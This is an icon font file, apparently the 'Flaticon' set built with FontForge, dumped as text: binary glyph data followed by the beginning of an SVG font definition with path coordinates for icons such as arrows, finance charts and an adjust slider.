<E��1:j����.>#"&>&'&#"#"'&?'&7676743>##"/76'.$#"'.76#"#'&?'&'76#"/&?143?'*&#05"#0.".0&'&501505>6765'&?67673217>?'4541&5054'41&5414&4'4541&=&541&505&'&'7#'"1#1#1#10####11121/76.#"#'765/2656765"#"'"#&#'"1#1"1"0#"1""1#0#0/32?/&>767136223762+"4372+"4372+"43�


A		 		%	
.-'F		3;?"NA	O	�	
,A#�u	4(�LJ
&.JcQ
#			��JJ44

5�
c]W`		C81�
>lJ*
]
L	R� 		
	'=%	7:		16	��.
-Hd
�"
?L<
		��++��������������	+"1"0#"1#"=15154&+"=#"=#"=#"=#"=+"/"1&5154222;&=47#""=476;54;5423542354235423232121235#"$4/7'3521110##1+1#1#"&=42;54;57/&676"7"4;2#"4;2#&676"'7"4;2#"4;2#"4;2#"4;2#"&462'"32>54&�		-!	===")	
;*===
"�s�""J(S�	�KD9�	^ii%�	`ii%%ii%k"	R'.M
���3K>32#>>��S44	K��::�
#T	
#F#"	�����.<[����7&767632'&#"#""'&7654&#"&7676326#"'&632'2#"'&'&63264&#"&7676676&7>&'#&76'#+"&764'&6;23>32#"&'#'&'"#"'.>?"32+3264&7'#2+"4;7&'&627120367>54'&6#3'01""10"#"'3'37&�02AE3
/?<--
$G2+!!	%%08P)! &;($4!!%55%
	,,&	
�
8	"C		C"�4	
��3�96�795*	:!&!$&")6%%8��$$�?)*/+&&9z$32G(-P89(
*
%�5K5
->,�

!


		#)	
	
_/	
�G

H(6+	/;*LG?-??3����Ueu����$1>KXe��2+"&=#"&46;5#"&46;5#"&46;5#"&46;546;2+"32+32+32+32+3;264&+1#";13264&+";264&+1#";13264&+""4;2"=4&#+"=46754?#"/46;2376;2354;2+5'##"354#"5'46';7#+"/#+"=54+""&4623264&"6"#"'&'&2#"54=#"#&'&6'#"'&'&6&'&6#"&/#"'&?93531;2131313313"/"'&?'&67�44	

		

		

		

	'    y�}
�
 0 `�
�n#�
�
X	



m;

#"5111551115~hhh|���P
  
yRR�B<�CC��

�!	


�6�21��

@��+;2#!"&=4623!2654&#!""&=463&?'&6#"�&&�&		


�
		&]334		4�&�&&@		@



@		@&��555	
4@��+82#!"&546;2+"3!2654&+"&463676"/�&&�&&@		@



@		�555	
4�&�&&&		
�


		�334		4!����
4l��������
$"&4632&"32>54".5476264&#"&7632'7654'.547542#"'&#""=&'451&1432++"=42354;'32"=#"&?627++"=#"&?623'323547++"=42354;'32"=#"&?62$+"4;6"#"'&75&6#"'2+"43&6#"#'"'&?6:qPP9%?$VeGG3. y.
1E22"!
&)::,	
	
		p3:+!"3�3:3!"+u3:+!"3��,,
x,
�PqP%?%8�GeG!-3�-"22E1:R:@	



	
�6	Y Z$$#	627	��	76$$��d7	�qj�##5.	7rB�4P�q%"&4?!"&463!'&462��p�i

�p��pp�����mrz��������AFK++3232#!"&=46;547546;542+35#"=4;5#32"=#"&=&=#"&?6/3763'&6!'&;535467546;5#"&=&=#+323547546;5#".=&=##2"=4;5#32+35'3135#35+"';5#35+"!!'#"'35'2+35#"=4;5#75#;1'"="&543235.547542#0&'5654'�$

		�2		
44
$�""�'��'�S�\��NFVFN�
8	8
�	8

8	�44;BFFB�BGGB��2�*BG644=GB�	

 
�

�

aZ
��zzk	nn~�
�

�

�

��

�����)���

t*	u"&4?!".5463!'&462Y��
��P��
o���
������MR^it���������%2+"4;26=4&+1#";2+"&=&/&6?6%'.&?6'%'46;7>/$#"'&?#"'&?6"&=46;2#'3541#0+".=46;2#0+3'"135;2=#32+"4"4;2#3"4;2#�

KK

e�
��
K
jj	=	��
U8��	=�
�2C��B
GH.		T		TTTt	B	B	CBD!!Jc!2��

�
qV

R�=
=
�Y
Y�ŷ��t�s�
))*
�				 "	2		2e&��������������++"'&?#;2"/.5422?>=#"'&'&"+"=4>;2767627#"#'#"&?'&637276;'&6;20;232#324'#2464/&+"&;'+32+"#/#3762;27&2"62"62"62">"/&=4767&76=&'&676"/�%	

	=[)%	%%&	..	(&*F2""2F)K+T		
	K
d%/�"L6qI3  3I��$#$�
"!!"	-	
2%+ 	
;EL//))J')@%43
%�
Ro�\��
'11'!{

	3++3	/$$/5	/	7�����01ABUVijz{������2"=7&?67#"/&6%"'&54676#765&546?&6+"56.'&'&6+"5.'&'6&'&6767''&6676767#"/"#&?&'376#"/&?67'&?6;2"5'4+"6'4276264&"6/?�[AA�A@��=3/9k"%!�
24+
!$:

1q0,h/
'!N# F	��|�-.�.
-.s�)�-KK�
%
%"%
%9a
Y5�=#'D+e8"A70
'0#<��			

	s+''#u
		y$�
//�!��6{�m	���5@D`kl���2323232#!"4;54;54632=&/&'&=463&/#"35#7>?!#"354#"&=4754+6765/&?'&6?627'&/76'&7�$.5��5/$ 0y�҄%2��2%��0 �				"

�9-&/LL0%-9��/��=�	8&��&8	##��
$/#!		!%



0����"*3<Xl��%/"#"/#"#&/&?&5462$264&"7&'767'7>6?62/#"'&?'776'&?'&/"&546762654.'&6&"&462�B[[BV4d�d4��X|XX|"O0&H5�5H&0O�


	(

AhJ+#		$>X>
		$*zC��C�2HFddFH2�|XX|X�8�}}�5�


�J4&@6 ,>>,@&4�
����%-5=[_2#!"4;546;23546;2346;2!54+"354+"34+""=/"'&?627#"4;242�

�0

17181��1�1�1Ri%��%c%

<�o,ZZ��>��ZZ��>���9

"j%��%c��
�����6qw���42426"&4664&""#"'&576?6376?#"#&5'#"'&'#"'&'&'&?&'&?'.?637>737'"67&'1&'6757654&#767>�m#



�
			�<52;

|;2G:'q?	�:uK*?,m
�]+,�
:j%�55�19?�##A



�			

�Bu)7F3;}
#;21:�\,�
7(It+,h6.�55z&m
s'=O%"&54>?32654&'#"'&547#'"&54>?32654&'#"'&547#�"FdFW/UB/. 
.j"FdFW/UB/. 
.�#12FF2&K1.	A�/! /
3Ym!u#12FF2&K1.	A�/! /
3Ym!���%2+"&=#"&46;54>23��������������Ihz~2+1"&46327&#"2654'&6"/#"'"'&?&'&46327542&'"&54>327&#"32654&?&#"2654'"642�

&0+
^�^^B;-#;PWzz�zC

7:8DD8:7
C�_XA*Q	)0C/&)'3:R&@&9R�(##3$)��1+$B]]�^($5z�zzW/+			/4_C
8:%$97	
C��;*&

 �)"//"%)"R9&@%Q:)$3##){0����'+c����2+#"/##"'&?#"&546;>2&"34+";54235423542354235423542354232'0"="//"'&?67627#"4;21;3121211424242�})	+D+	)}�$*8��P�!ZH$HS

+�����y		y����'

'3

37

7i

iO

Op

p�

��+

ZH$HS)(���W����"/+"&/&'"/&4?&/.=46?67'&4?626?>;276254&/&'&'&?6/&'&'&/.+"/&?632;26?67676?6/&7676?2>$2"#"'&7>54&"'&'&54#"/&=42&4242�

(



8



(



(



8



(

)	
'
8
'
		
'
8
'

�ц_7#
.<SvS9-

3 !�H8



(



(



8



(



(



a8
'
		
'
8
'
		
'�_C$A.
	M0;SS;/L
*,6Cr72

-M�����B����642$42'2"="&542;2=4+"&=4675422"54+";/&##"'&=4?676354675'&6?676"=4&+"#"/&6676./&36?>.&?36'5#;'37'/6/1'4&767Mk}		��)(/ {?	
18) ,:(%-

_	I
	I_%$1#((/ �?			?d)%=2�-9			lxU
	



					

	

		q9>�5+B-+!2

):-7#
#
O9�H �fgT
)7���570!0���0� 0����� 126"&4632'&#"2654'&7&232+"&=47��Ԗ�jYF9KX}}�}�V

k	54;j��Ԗ7.}�}}X1,2
	�	�	
	���0;E[a��2"=4&+""=4632#!".='&=46354.+3%5#"32=+"='32!5463'35#%54&+"=!"=#"54;2642 42>	z
	�F
(
�
6�
H
�&�44,��(�
H
a���

		

QZ�	

�Y��
66
L�3 

 4�81DS#

##

#Q8

T
��y_gt�������%#"'"/#"&5"&51"&547'#"/&?62?64/&6;7&?6?'&6264&"654&"327664&#""27>4/#"&4?#"/632122264/&476764/&6676'1'&6?'+2?636164242642642�:
!
	
		
				 
:`Y3c!"!-#"e3X��	<"�A%!	
'
Y 				

		 S
15
$,s�&��;
	
	

				!;`Y3b!!
""e3X�&"	I
@!		(X 			
		
	
	+R
6	%}������!56#!"&76;54>3232'354&"!#"&=#"&=#�	�c	'I+#I�%5%~{$;	
		
	;$/

r,#&&�bU"		""		"������"*-5?IM%"'&'&?63!2#'7#'3'7!7673'&2"="'&?"/&642���W6tGHH2t-@?ll�R{��Q;"l?�^$	%w	$����cHIIOHAH����ߠ		ZH�
4

4$$$$�	F����@KNv�642&4242427"32#!"=463546724#.=.=43!2#!1#"!4&'3'7&476=#"4;2>7!;27654'2+""54+"4;263�f>N
��

`
	��
L�XK

.�

�
	��
-

-tt&

=<

<		���5b5Y



Y55Y

Y5�

,�7Y
a77S::S7�

		*����8@\q�/+"/"#"'7676#"1"/&?&546276'&6$264&"#"#'&57'&6?627'&/762'&6#"&4632'.#"3267�B!IG1F89?!BP!a�aL:B8=��WzWWz�'	22	'7
71,,''PK17MM71K!26D0+B<�4�3��<�,6DaaD;[�3��{WW{Wq
(77(
	11	-'',,1BNmMA1.5 /D9+v����7"/&4?62������������"#+,;CDLMU`aop~"&462"&54>326"32>54'"&462"&54>32&"264'&"&462"&462&"3264'"'&6?6#"/.>#�(:((:(E#2'#2
 ,5E(:((:(E#2
 #2',,5�)9))9)"G22G2@, 63
�	���	��9))9)EV2$'2#�, ��9))9)FU2#2$'� ,, �:((:(EU2F22FX,+qq�qq����)%2"&547'#"&46327&54632#"'6�'77M7�/&77&-�7'+7&/��{7M77&P%6N6#Q
&7+'7&Q
Q$���$%2++"&=#"&=46;546;2�����
����@@!%2+53264&+5;#"&46;#"53�5K";#ff!..!f�.!ff5KK5ff!;�@K5#;"1.B.1_B.1KjK1i44��� 2"'&'.54632676x:N9(*((*(9N:*""�T@4':#%""%#:'4@T!!��� D#"'#&'&'&54763267632>54'&#""'&'&#"6�%4 c))c 4%(;A**A;~(&6.2!!2.
1 ""v+<?>&T##T&>?<+,;

;��#!5$-1"".

.""1#'.���''7'77��<��<��<�����<��<��<��6����3#!"&546;7#[n ��  �PP@��  � nuP�����/#"'&?'&6?62�
p!�	!p
�:$:��"b�	LL�b"������#2"&4264&"62"&42"&=4�Ԗ�Ԗ��zz�z�


��Ԗ���z�zz��Z	�


�		���7OW_r��&'&47>762"'"264"'.'&47>762"27>764'.'"&462"264'&47>762"2"/&462762&"2?64&"'oGG./h/.GG./h/�������h0.FF.0h0.FF.0h/.GG./h/.GG.�������������I
	<��I<��OI��<G./h/.GG./h/.Gŀ������F.0h0.FF.0h0.F�G./h/.GG./h/.G�:�����5������I;��I<��h
I��<	���7OW_{��&'&47>762"'"264"'.'&47>762"27>764'.'"&462"264&4?'&462762"/"/"&4?'&462762'264/764&"'&"27oGG./h/.GG./h/�������h0.FF.0h0.FF.0h/.GG./h/.GG.�������������EEEEEEEE�DDDDDDDDeEEEEEEEG./h/.GG./h/.Gŀ������F.0h0.FF.0h0.F�G./h/.GG./h/.G�:�����5������EEEEEEEEDDDDDDDD@EEEEEEE��� !,->NOWXcghptu}��7"/&4?6#3"'&?'&6#"'&?6#!"&5463!2"3!2654&#!!"43!2#%".5462&"2'"&462&"2'"&462&"2'�77//l//77I""�r!!�!�b��r�����
G
�	w/.
)(()
./#	��X"R!!�����Rv(
%%%���'5CGUfr2+32+32#!".4;546;54633234;54#!"67#+"5#3!273'#754#!"32322+"&=46354+";2�l-		^	��		o
�x"	w��	,3	~
 
�	���
�	DM	DD	��+^����	��+�		�U����		�	&Z.9ALW_gr}��2+"43!2+"43#"'&7>7#"'.'&62#"&4264&"$2#"&42654.#"2"&4264&"'2"&46264&#"$2"&4264&#"�		w		D		w		R9U
0E)
T9	=\*%�s*
%		�**%�
*		�**%		/R8(D.	�8R
Y7+8B+8		++8B+V

B++8

�����(08'"/&4?627&67626/&7$64&"'64'�856�<		g				f		47:��fOgg�gg�--''�7�:<6		f			
f		:�89�~ftg�gg�g-�.'o(�����
)7HVdr����7#"'.76326&'&#"327"'&67632&327>'&#"'.7>32#"'3276&'&#"#"'&67632'327>'&#"%#"'&54>7>54&'.5476326763267#"'&67>7>767&'&#"327'327676�


�
	]

	
	B
9�
"CD`75>
	
>57N=6W�4	&!	! 
	4B59G205		e2Y!&

<�09@6<t"
	"
7	�  9

	.V	"
	"C
")]CC%4
	


4%.(?J��3H*!)4:>'**
	

)<p&


�:185>���/:JR7"&546742264&""=.4675422654.#"%"5.5462264&"I&4&&&�
	""(

1&4&S&&H$&&$f		�-&&
%
�		�&2&�		��
(�$��		f$&&H&&{;C�����>3264&"'&5462#"'6&?#2?6+"/&?6;2'3'&+"2+"&=#"'&'&'&476767#+"&=46;23632#"'&'"'62676764'&'&63546354+";26"02741426754&"54+";2�	%+<<V<EbEE1* xl1		5	>	
Vl>�*<=+&

&+%%{�
-.+)&7:*$$*97*79*$&+	-'

&+"#v�S�


�h<V<<+ 	%1EEbE>
:
>>�	0!. .!
		- -- -- -/!"0 .!�������%"/"&4?'&462762���������������v����%"&4?'&462�����

�����t62!2#!"/&47����P��o�
����q%2#!"/&4?62�

�ip��p�p��p�����3###53546;#" ` @`@@8(@ 
P�PP(8P
���'/:2+"&=46354&+";262"&4264&"74>32"&`B^^B�B^^B0B.�.BB.�.B��jKKjK_B//B/�


�^B�B^^B�B^���.BB.�.BBKjKKj�/B//B�


���/#"'327.'327.=3&547&54632676(ItFXII9"5
%0/'q@=+.$"_!5iW6/,) 9&
81:
+>!%����
)*2+".5473#%2#54#"#3>3 4 :4ggd5Ag4%gg����6FE��F&�6-0����>2#"&'&'&?&54763276'&'&#"'.546Ut`I*	
&
&
8[0G%r�gLQp;1H*�4
 !>??M.@G
G$Nn `$%3##5#53533"&4632&#"32>7#�@@ @@ ��^�^^B<,*$(88(%[� @@ @@ B^^�^'08P8���)4;F7'>77&'632.54&732767#"'&7>%&'67&&'>7�`KE1B.&�$<$,C..TE�Ml+1!'49('$&F>c	Q<fUXl:<E�7Y?U�
 !
TC4�c4$f:
<cj&
+XBhgc "1Ja)-HO7+3'32654'&#654'&+32753#327673#"&546323.#"�	
)��:	�M(NM��/�
?9/GA31�i�&
8 
SE�
	S�&&s#
	

"9@<@!t�� #$#"'&'.'547>7>3727'�		"^''�&!	
^'&�%"��}}�:N&!	
	":N&	�HH�����(%.>5462.6?.>'&>�
"(F˔��J
rT$e5Vd��e	
�9o*I�˓FFr&'#	��e�V
	�.$���				H6	�	 �	�FlaticonFlaticonRegularRegularFontForge 2.0 : Flaticon : 31-7-2020FontForge 2.0 : Flaticon : 31-7-2020FlaticonFlaticonVersion 001.000 Version 001.000 FlaticonFlaticon��T	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQ001-download
002-search003-menu004-left-arrow005-play006-icon-121954007-phone-call008-placeholder	009-check010-call011-right-arrow012-up-arrow013-send014-pin015-search-1
016-effort017-task
018-target019-strategy
022-arrows023-arrows-1024-business-and-finance025-trajectory026-business-and-finance-1027-arrowsoutline028-card029-holidays
030-energy	032-award	033-badge034-bars-chart
035-rocket036-left-quote	037-signs038-aim	039-chart	040-clock	041-money
042-interface
043-symbol
044-portfolio045-deal046-business047-precious-stone
048-hourglass051-certificate052-arrows-2	053-share054-files-1055-signs-1056-multimedia057-shapes-and-symbols058-like	059-close060-document061-star062-null
063-null-1
064-null-2
065-null-3
066-tablet067-illustration068-search-2	069-paint
070-adjust
071-vision
072-cancel077-next079-left-arrow-2080-arrow-pointing-to-left081-facebook
082-instagram083-twitter084-linkedin
085-pinterest086-google-plus087-dribble088-behance089-youtube090-refresh��դ'�I���I��PK�8FZ
�+n��fonts/Flaticon.svgnu�[���<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
<!--
2020-7-31: Created with FontForge (http://fontforge.org)
-->
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<metadata>
Created by FontForge 20170731 at Fri Jul 31 10:33:35 2020
 By root

</metadata>
<defs>
<font id="Flaticon" horiz-adv-x="512" >
  <font-face 
    font-family="Flaticon"
    font-weight="400"
    font-stretch="normal"
    units-per-em="512"
    panose-1="2 0 5 3 0 0 0 0 0 0"
    ascent="448"
    descent="-64"
    bbox="-0.012207 -64.002 512.998 452.566"
    underline-thickness="25.6"
    underline-position="-51.2"
    unicode-range="U+0020-F14F"
  />
    <missing-glyph />
    <glyph glyph-name="space" unicode=" " horiz-adv-x="200" 
 />
    <glyph glyph-name="011-right-arrow" unicode="&#xf10a;" 
d="M398.23 211.979c5.28223 -5.28711 8.18359 -12.3467 8.16699 -19.8848c0.0166016 -7.50977 -2.88477 -14.5732 -8.16699 -19.8643l-228.059 -228.05c-5.26953 -5.27441 -12.3047 -8.17969 -19.8057 -8.17969s-14.5312 2.90527 -19.8057 8.17969l-16.7793 16.7705
c-5.26953 5.27832 -8.17871 12.3086 -8.17871 19.8145c0 7.49609 2.90918 14.5273 8.17871 19.8008l191.541 191.541l-191.328 191.328c-10.9189 10.9141 -10.9189 28.6797 0 39.6104l16.7793 16.7754c5.26953 5.27441 12.3047 8.17969 19.8057 8.17969
s14.5352 -2.90527 19.8057 -8.17969z" />
    <glyph glyph-name="024-business-and-finance" unicode="&#xf115;" 
d="M257.756 174.587c-75.3799 0 -136.707 61.3262 -136.707 136.707c0 75.3799 61.3262 136.706 136.707 136.706s136.707 -61.3262 136.707 -136.706c0 -75.3809 -61.3262 -136.707 -136.707 -136.707zM257.756 432.971c-67.0928 0 -121.678 -54.585 -121.678 -121.677
c0 -67.0938 54.585 -121.678 121.678 -121.678s121.677 54.585 121.677 121.678s-54.584 121.677 -121.677 121.677zM257.755 212.426c-54.5146 0 -98.8662 44.3525 -98.8662 98.8672c0 16.458 4.12793 32.7559 11.9375 47.1309
c1.98145 3.64648 6.54395 4.99805 10.1895 3.0166c3.64746 -1.98145 4.99707 -6.54297 3.0166 -10.1904c-6.61719 -12.1797 -10.1143 -25.9971 -10.1143 -39.957c0 -46.2285 37.6094 -83.8379 83.8369 -83.8379c46.2295 0 83.8389 37.6104 83.8389 83.8379
c0 46.2285 -37.6094 83.8379 -83.8389 83.8379c-20.8682 0 -40.8662 -7.71484 -56.3086 -21.7236c-3.07324 -2.79004 -7.82617 -2.55762 -10.6152 0.516602c-2.78809 3.07422 -2.55664 7.82617 0.516602 10.6152c18.2139 16.5215 41.7988 25.6211 66.4072 25.6211
c54.5166 0 98.8682 -44.3525 98.8682 -98.8672s-44.3516 -98.8672 -98.8682 -98.8672zM254.898 275.889c5.86523 -0.357422 10.3379 0.874023 13.2988 3.66113c3.13184 2.94727 4.24707 7.32812 4.24707 10.4453c0 2.93359 0 11.8633 -17.2686 13.7686
c-20.0635 2.21387 -27.1826 15.6396 -27.1826 26.4619c0 9.73438 5.5957 23.5732 20.4277 27.0957v10.0547c0 4.15039 3.36523 7.51465 7.51465 7.51465c4.15137 0 7.51562 -3.36426 7.51562 -7.51465v-10.0869c10.2539 -2.48047 16.2344 -9.68262 18.3525 -14.2871
l-0.00390625 -0.00195312c0.52832 -1.0293 0.832031 -2.19336 0.832031 -3.42871c0 -4.1582 -3.37109 -7.5293 -7.5293 -7.5293c-3.16309 0 -5.86719 1.9541 -6.98145 4.71973c-0.625 1.13965 -3.9502 6.37598 -12.1846 6.37598
c-12.5498 0 -12.9121 -11.5908 -12.9121 -12.9131c0 -1.07227 0.212891 -3.83789 2.18164 -6.34082c2.23047 -2.83398 6.13965 -4.57812 11.6201 -5.18262c27.6631 -3.05176 30.6484 -21.0918 30.6484 -28.707c0 -8.10449 -3.35547 -16.1006 -8.97656 -21.3906
c-3.02148 -2.84277 -7.85352 -5.98633 -15.0459 -7.23828v-9.77344c0 -4.15039 -3.36426 -7.51465 -7.51562 -7.51465c-4.14941 0 -7.51465 3.36523 -7.51465 7.51465v9.99902c-16.4121 3.17773 -21.9805 15.0732 -23.3711 18.9072
c-0.140625 0.333008 -0.25 0.680664 -0.341797 1.03613c-0.0185547 0.0644531 -0.0332031 0.117188 -0.0400391 0.143555l0.00292969 0.000976562c-0.133789 0.563477 -0.212891 1.14746 -0.212891 1.75098c0 4.15918 3.37109 7.53027 7.5293 7.53027
c3.48242 0 6.4043 -2.36816 7.26465 -5.58008c0.600586 -1.66895 3.84277 -8.77148 15.6455 -9.49121zM130.238 100.006l51.0439 -54.2676c2.05371 -2.18359 2.6123 -5.37891 1.42383 -8.12988c-1.19043 -2.75195 -3.90137 -4.5332 -6.89844 -4.5332h-14.7539v-89.5605
c0 -4.14941 -3.36426 -7.51465 -7.51465 -7.51465h-57.5547c-4.15039 0 -7.51562 3.36523 -7.51562 7.51465v32.2119c0 4.15039 3.36523 7.51562 7.51562 7.51562c4.14941 0 7.51465 -3.36523 7.51465 -7.51562v-24.6963h42.5264v89.5596
c0 4.15039 3.36426 7.51562 7.51465 7.51562h4.88379l-33.6611 35.7852l-33.6611 -35.7852h4.88477c4.14941 0 7.51465 -3.36523 7.51465 -7.51562v-34.8037c0 -4.15039 -3.36523 -7.51465 -7.51465 -7.51465c-4.15039 0 -7.51562 3.36426 -7.51562 7.51465v27.2891
h-14.7539c-2.99805 0 -5.70898 1.78125 -6.89746 4.5332c-1.18945 2.75098 -0.629883 5.94531 1.42383 8.12988l51.0469 54.2676c1.4209 1.50977 3.40137 2.36621 5.47363 2.36621c2.07324 0 4.05469 -0.856445 5.47461 -2.36621zM263.229 151.706l51.0469 -54.2695
c2.05371 -2.18262 2.61328 -5.37891 1.4248 -8.12988c-1.19043 -2.75195 -3.90039 -4.53223 -6.89844 -4.53223h-14.7539v-141.26c0 -4.14941 -3.36426 -7.51465 -7.51465 -7.51465h-57.5557c-4.14941 0 -7.51465 3.36523 -7.51465 7.51465v141.26h-14.7539
c-2.99805 0 -5.70898 1.78027 -6.89844 4.53223c-1.18945 2.75098 -0.629883 5.94629 1.4248 8.12988l51.0459 54.2695c1.4209 1.50977 3.40039 2.36621 5.47363 2.36621s4.05371 -0.856445 5.47363 -2.36621zM286.533 99.8027v0.000976562h4.88184l-33.6611 35.7861
l-33.6611 -35.7861h4.88379c4.15039 0 7.51562 -3.36426 7.51562 -7.51465v-141.26h42.5254v141.259c0 4.15039 3.36426 7.51465 7.51562 7.51465zM396.221 199.54l51.0439 -54.2676c2.05469 -2.18359 2.61426 -5.37988 1.42578 -8.13086
c-1.19043 -2.75195 -3.90039 -4.53223 -6.89844 -4.53223h-14.7539v-189.096c0 -4.14941 -3.36426 -7.51465 -7.51465 -7.51465h-57.5566c-4.15039 0 -7.51465 3.36523 -7.51465 7.51465v113.178c0 4.15039 3.36426 7.51465 7.51465 7.51465
c4.15137 0 7.51562 -3.36523 7.51562 -7.51465v-105.662h42.5254v189.094c0 4.15039 3.36426 7.51465 7.51562 7.51465h4.88281l-33.6602 35.7861l-33.6611 -35.7861h4.88281c4.15137 0 7.51562 -3.36426 7.51562 -7.51465v-53.373
c0 -4.15039 -3.36426 -7.51465 -7.51562 -7.51465c-4.15039 0 -7.51465 3.36426 -7.51465 7.51465v45.8594h-14.7539c-2.99805 0 -5.70801 1.78027 -6.89844 4.53223c-1.18848 2.75098 -0.628906 5.94727 1.4248 8.13086l51.0479 54.2676
c1.41992 1.50977 3.40137 2.36621 5.47363 2.36621c2.07324 0 4.05371 -0.856445 5.47363 -2.36621zM92.8047 308.604c0 -4.14941 -3.36328 -7.51367 -7.51465 -7.51465h-44.0752c-4.15039 0 -7.51465 3.36523 -7.51465 7.51465c0 4.15039 3.36523 7.51562 7.51465 7.51562
h44.0752c4.15039 0 7.51465 -3.36523 7.51465 -7.51562zM95.0117 249.63c3.86328 1.51367 8.22363 -0.391602 9.73828 -4.25488c1.51367 -3.86426 -0.390625 -8.22363 -4.25586 -9.73828l-15.6758 -6.14062c-0.900391 -0.353516 -1.82715 -0.520508 -2.73926 -0.520508
c-3.00195 0 -5.83789 1.81152 -6.99902 4.77539c-1.51367 3.86426 0.390625 8.22363 4.25586 9.73828zM79.3359 373.721c-3.86426 1.51465 -5.76953 5.87402 -4.25586 9.7373c1.51367 3.86426 5.87207 5.76953 9.73828 4.25586l15.6758 -6.14062
c3.86523 -1.51465 5.76953 -5.87402 4.25586 -9.73828c-1.16113 -2.96289 -3.99707 -4.77539 -6.99902 -4.77539c-0.912109 0 -1.83789 0.166992 -2.73926 0.520508zM470.785 316.119c4.14941 0 7.51367 -3.36523 7.51465 -7.51562
c0 -4.14941 -3.36426 -7.51465 -7.51465 -7.51465h-44.0752c-4.15137 0 -7.51465 3.36523 -7.51465 7.51465c0 4.15039 3.36328 7.51562 7.51465 7.51562h44.0752zM411.506 235.635c-3.86426 1.51562 -5.76855 5.875 -4.25488 9.7373
c1.51465 3.86426 5.87109 5.76953 9.73926 4.25586l15.6748 -6.14062c3.86426 -1.51465 5.76855 -5.87402 4.25488 -9.73828c-1.16113 -2.96289 -3.99707 -4.77539 -6.99902 -4.77539c-0.912109 0 -1.83887 0.166992 -2.74023 0.520508zM414.25 367.06
c-3.00195 0 -5.83789 1.81152 -6.99902 4.77637c-1.51367 3.86426 0.390625 8.22363 4.25488 9.73828l15.6748 6.14062c3.86328 1.51172 8.22461 -0.390625 9.73926 -4.25586c1.51367 -3.86426 -0.390625 -8.22363 -4.25488 -9.73828l-15.6748 -6.14062
c-0.900391 -0.353516 -1.82812 -0.520508 -2.74023 -0.520508z" />
    <glyph glyph-name="067-illustration" unicode="&#xf13d;" 
d="M213.332 302.933c4.71582 0 8.53516 -3.81738 8.53516 -8.53223c0 -4.71582 -3.81738 -8.5332 -8.53223 -8.5332h-119.468c-4.71484 0 -8.53223 3.81738 -8.53223 8.5332c0 4.71484 3.81738 8.53223 8.53223 8.53223h119.465zM418.133 302.933
c4.71484 0 8.53516 -3.81738 8.53223 -8.53223c0 -4.71582 -3.81738 -8.5332 -8.53223 -8.5332h-119.468c-4.71484 0 -8.53223 3.81738 -8.53223 8.5332c0 4.71484 3.81738 8.53223 8.53223 8.53223h119.468zM219.05 291.388
c0.990234 -4.60059 -1.93262 -9.14258 -6.54004 -10.1406c-75.5996 -16.3496 -136.542 -75.417 -155.242 -150.489c-0.969727 -3.88281 -4.4502 -6.47266 -8.27734 -6.47266c-0.682617 0 -1.37305 0.0849609 -2.07227 0.251953
c-4.56543 1.14258 -7.35254 5.77539 -6.21777 10.3506c20.2744 81.3252 86.292 145.325 168.207 163.04c4.52734 1.01758 9.14551 -1.93262 10.1426 -6.54004zM474.995 134.883c1.13477 -4.5752 -1.65039 -9.20801 -6.21973 -10.3506
c-0.703125 -0.166992 -1.39551 -0.24707 -2.07812 -0.24707c-3.82227 0 -7.30762 2.58984 -8.27246 6.46777c-18.71 75.0771 -79.6426 134.14 -155.242 150.489c-4.60742 1 -7.53516 5.54297 -6.54004 10.1426c1 4.60742 5.54199 7.55566 10.1426 6.54004
c81.917 -17.7148 147.935 -81.707 168.21 -163.042zM460.8 140.8c28.2324 0 51.2002 -22.9678 51.2002 -51.2002s-22.9678 -51.1992 -51.2002 -51.1992s-51.2002 22.9668 -51.2002 51.1992s22.9678 51.2002 51.2002 51.2002zM460.8 55.4678
c18.8252 0 34.1328 15.3076 34.1328 34.1318c0 18.8252 -15.3076 34.1328 -34.1328 34.1328c-18.8223 0 -34.1318 -15.3076 -34.1318 -34.1328c0 -18.8223 15.3066 -34.1318 34.1318 -34.1318zM51.2002 140.8c28.2324 0 51.2002 -22.9678 51.2002 -51.2002
s-22.9678 -51.1992 -51.2002 -51.1992s-51.2002 22.9668 -51.2002 51.1992s22.9678 51.2002 51.2002 51.2002zM51.2002 55.4678c18.8252 0 34.1318 15.3076 34.1318 34.1318c0 18.8252 -15.3066 34.1328 -34.1318 34.1328s-34.1328 -15.3076 -34.1328 -34.1328
c0 -18.8223 15.3076 -34.1318 34.1328 -34.1318zM256 345.6c28.2324 0 51.2002 -22.9668 51.2002 -51.1992s-22.9678 -51.2002 -51.2002 -51.2002s-51.2002 22.9678 -51.2002 51.2002s22.9678 51.1992 51.2002 51.1992zM256 260.268
c18.8252 0 34.1328 15.3076 34.1328 34.1328c0 18.8223 -15.3076 34.1318 -34.1328 34.1318c-18.8223 0 -34.1328 -15.3076 -34.1328 -34.1318c0 -18.8232 15.3076 -34.1328 34.1328 -34.1328zM51.2002 345.6c28.2324 0 51.2002 -22.9668 51.2002 -51.1992
s-22.9678 -51.2002 -51.2002 -51.2002s-51.2002 22.9678 -51.2002 51.2002s22.9678 51.1992 51.2002 51.1992zM51.2002 260.268c18.8252 0 34.1318 15.3076 34.1318 34.1328c0 18.8223 -15.3066 34.1318 -34.1318 34.1318s-34.1328 -15.3076 -34.1328 -34.1318
c0 -18.8232 15.3076 -34.1328 34.1328 -34.1328zM460.8 345.6c28.2324 0 51.2002 -22.9668 51.2002 -51.1992s-22.9678 -51.2002 -51.2002 -51.2002s-51.2002 22.9678 -51.2002 51.2002s22.9678 51.1992 51.2002 51.1992zM460.8 260.268
c18.8252 0 34.1328 15.3076 34.1328 34.1328c0 18.8223 -15.3076 34.1318 -34.1328 34.1318c-18.8223 0 -34.1318 -15.3076 -34.1318 -34.1318c0 -18.8232 15.3066 -34.1328 34.1318 -34.1328z" />
    <glyph glyph-name="070-adjust" unicode="&#xf140;" 
d="M73.1426 72.4111c30.9668 -4.46094 54.8574 -31.0947 54.8574 -63.2686c0 -35.2822 -28.709 -64 -64 -64s-64 28.7178 -64 64c0 32.1738 23.8906 58.8076 54.8574 63.2686v357.303c0 5.05664 4.0957 9.14355 9.14258 9.14355s9.14258 -4.08691 9.14258 -9.14355v-357.303
